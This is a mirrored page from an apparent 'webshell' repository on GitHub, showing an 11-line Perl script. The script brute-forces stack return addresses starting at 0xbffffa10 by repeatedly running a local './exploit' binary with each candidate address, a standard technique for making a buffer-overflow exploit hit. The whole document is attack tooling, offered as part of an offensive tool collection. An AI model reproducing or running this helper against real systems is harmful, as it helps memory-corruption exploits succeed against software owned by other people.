mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
11 lines
164 B
Perl
11 lines
164 B
Perl
#!/usr/bin/perl
|
|
|
|
$cnt = 0xbffffa10;
|
|
|
|
while (1) {
|
|
$hex = sprintf ("0x%x", $cnt);
|
|
$res = system ("./exploit $hex");
|
|
printf "$hex : $res\n";
|
|
$cnt += 4;
|
|
}
|
|
|